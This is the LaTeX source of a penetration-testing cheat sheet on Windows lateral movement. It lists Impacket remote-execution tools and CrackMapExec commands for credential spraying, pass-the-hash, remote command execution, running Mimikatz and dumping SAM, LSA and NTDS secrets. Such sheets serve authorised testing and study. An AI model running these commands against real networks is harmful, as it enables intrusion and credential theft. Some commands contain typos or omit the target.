\author{tz-pl}
\pdfinfo{
  /Title (windows-lateral-movement.pdf)
  /Creator (Cheatography)
  /Author (tz-pl)
  /Subject (Windows Lateral Movement Cheat Sheet)
}
% Switch to any value
% from this page to resize cheat sheet text:
% www.emerson.emory.edu/services/latex/latex_169.html
\footnotesize % Small font.
\begin{multicols*}{2}
\begin{tabularx}{8.4cm}{x{1.368 cm} x{4.56 cm} x{1.672 cm} }
\SetRowColor{DarkBackground}
\mymulticolumn{3}{x{8.4cm}}{\bf\textcolor{white}{Impacket}} \tn
% Row 0
\SetRowColor{LightBackground}
{\bf{PSExec}} & Writable share required, default ADMIN\$. Interactive shell or single command. Similar to psexec.exe, uses RemComSVC. & SMB - 445 \tn
% Row Count 5 (+ 5)
% Row 1
\SetRowColor{white}
{\bf{SMBExec}} & No writable share required. Requires 4 SMB connections. Doesn't use RemComSVC. Semi-interactive shell or single command. & SMB - 445 \tn
% Row Count 10 (+ 5)
% Row 2
\SetRowColor{LightBackground}
{\bf{ATExec}} & Writable share required, default ADMIN\$. Runs a single command through the Task Scheduler. & SMB - 445 \tn
% Row Count 14 (+ 4)
% Row 3
\SetRowColor{white}
{\bf{WMIExec}} & Semi-interactive shell through WMI. No service/agent installation required; runs with elevated privileges if possible. Stealthy. & RPC, WMI - 135 \tn
% Row Count 20 (+ 6)
% Row 4
\SetRowColor{LightBackground}
{\bf{DCOMExec}} & Semi-interactive shell, similar to WMIExec but using different DCOM endpoints. Blocked by default due to Windows firewall rules.
& RPC, DCOM - 135 \tn
% Row Count 26 (+ 6)
\hhline{>{\arrayrulecolor{DarkBackground}}---}
\SetRowColor{LightBackground}
\mymulticolumn{3}{x{8.4cm}}{{\bf{Example:}} \newline `python \textless{}script.py\textgreater{} domain/user:password@IP \textless{}command\textgreater{}` \newline \newline PSExec, SMBExec and WMIExec open a shell if \textless{}command\textgreater{} is left blank} \tn
\hhline{>{\arrayrulecolor{DarkBackground}}---}
\end{tabularx}
\par\addvspace{1.3em}
\begin{tabularx}{8.4cm}{X}
\SetRowColor{DarkBackground}
\mymulticolumn{1}{x{8.4cm}}{\bf\textcolor{white}{CrackMapExec}} \tn
% Row 0
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{Swiss army knife for pentesting with many features. Sprays credentials across the environment to enumerate shares, sessions, disks, users and login privileges, execute commands, dump SAM and LSA secrets, run mimikatz, and more. \{\{nl\}\}Can perform command execution via Impacket's smbexec, wmiexec and atexec.} \tn
% Row Count 6 (+ 6)
% Row 1
\SetRowColor{white}
\mymulticolumn{1}{x{8.4cm}}{{\bf{Spray domain creds:}} `crackmapexec -u user -p 'P@ssw0rd' -d domain.com`} \tn
% Row Count 8 (+ 2)
% Row 2
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{{\bf{Spray local creds:}} `crackmapexec -u user -p 'P@ssw0rd' -{}-local-user`} \tn
% Row Count 10 (+ 2)
% Row 3
\SetRowColor{white}
\mymulticolumn{1}{x{8.4cm}}{{\bf{Spray creds from files:}} `crackmapexec -u users.txt -p passwords.txt`} \tn
% Row Count 12 (+ 2)
% Row 4
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{{\bf{Pass-the-hash:}} `crackmapexec -u user -H NTLMhash`} \tn
% Row Count 14 (+ 2)
% Row 5
\SetRowColor{white}
\mymulticolumn{1}{x{8.4cm}}{{\bf{Execute command:}} `crackmapexec -u user -p 'password' -{}-exec-method smbexec -x whoami`} \tn
% Row Count 17 (+ 3)
% Row 6
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{{\bf{Run Mimikatz:}} `crackmapexec -u user -p 'password' -M \seqsplit{modules/credentials/mimiaktz}.py -o
\seqsplit{COMMAND='privilege::debug;sekurlsa::logonpasswords'`}} \tn
% Row Count 21 (+ 4)
% Row 7
\SetRowColor{white}
\mymulticolumn{1}{x{8.4cm}}{{\bf{Common Enumeration Options}}} \tn
% Row Count 22 (+ 1)
% Row 8
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{Enumerate shares: `-{}-shares`} \tn
% Row Count 23 (+ 1)
% Row 9
\SetRowColor{white}
\mymulticolumn{1}{x{8.4cm}}{Dump SAM, LSA or NTDS: `-{}-sam` `-{}-lsa` `-{}-ntds`} \tn
% Row Count 24 (+ 1)
% Row 10
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{Sessions: `-{}-sessions`} \tn
% Row Count 25 (+ 1)
% Row 11
\SetRowColor{white}
\mymulticolumn{1}{x{8.4cm}}{Logged-on users: `-{}-lusers`} \tn
% Row Count 26 (+ 1)
\hhline{>{\arrayrulecolor{DarkBackground}}-}
\end{tabularx}
\par\addvspace{1.3em}
% That's all folks
\end{multicols*}
\end{document}